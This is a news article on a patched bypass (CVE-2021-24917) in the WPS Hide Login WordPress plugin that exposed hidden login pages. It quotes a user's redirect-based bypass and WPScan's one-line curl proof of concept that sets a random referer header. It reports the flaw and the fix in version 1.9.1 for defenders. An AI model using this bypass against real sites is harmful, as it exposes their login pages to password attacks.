The WPS Hide Login WordPress plugin recently patched a vulnerability exposing users’ secret login pages. The vulnerability allows malicious hackers to bypass the plugin’s primary function of hiding the login page, potentially opening the site to password and login attacks.
Essentially, the vulnerability completely undermines the intended purpose of the plugin, which is to hide the WordPress login page.
WPS Hide Login
The WPS Hide Login security plugin protects WordPress sites from hacker attacks by hiding the administrator login page and making the wp-admin directory inaccessible. It’s utilized by over one million websites to add an extra layer of security.
Preventing hackers and automated bots from attacking the default login page doesn’t necessarily require a plugin. An alternative method is to install WordPress into a directory folder with a random name. This way, bots targeting the typical login page URL will fail to find it.
Instead of appearing at /wp-login.php, the login page is effectively hidden at /random-file-name/wp-login.php. Bots generally expect the default login page location and do not search for it elsewhere.
WPS Hide Login is especially useful for sites with WordPress installed in the root directory, i.e., example.com/.
Report of Vulnerability
The vulnerability was publicly reported on the plugin’s support page. A user noted that if the main home page is redirected, appending a specific filename to the redirected URL will expose the hidden login page’s URL.
User Explanation
“For example, with the following domain: sub.domain.com, if domain.com redirects to sub.domain.com, there is a bypass:
Entering the URL domain.com and adding /wp-admin/options.php will redirect to sub.domain.com/changedloginurl, revealing the login URL and allowing log in.”
Security Site Published a Proof of Concept
WPScan, a WordPress security organization, published a proof of concept, which is an explanation demonstrating that a vulnerability is real.
Security Researchers’ Publication
“The plugin has a bug that allows access to the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user.
Proof of Concept:
curl –referer “something” -sIXGET https://example.com/wp-admin/options.php
HTTP/2 302 ”
The United States government’s National Vulnerability Database rated the vulnerability as a high-level exploit, scoring it 7.5 out of 10, with 10 representing the highest threat level.
WPS Hide Login Vulnerability Patched
The publishers of the WPS Hide Login plugin have addressed this issue in version 1.9.1.
According to the WPS Login Changelog
“1.9.1
Fix: bypass security issue allowing an unauthenticated user to get login page by setting a random referer string via curl request.”
Users of the affected plugin should consider updating to the latest version, 1.9.1, to effectively hide their login page.
Citations
US Government National Vulnerability Database
- CVE-2021-24917 Detail
WPScan Report of WPS Hide Login Vulnerability
- WPS Hide Login < 1.9.1 – Protection Bypass with Referer-Header
Plugin Report of Vulnerability
- Bypass-SECURITY ISSUE!!!
Official Plugin Changelog
- WPS Hide Login Changelog
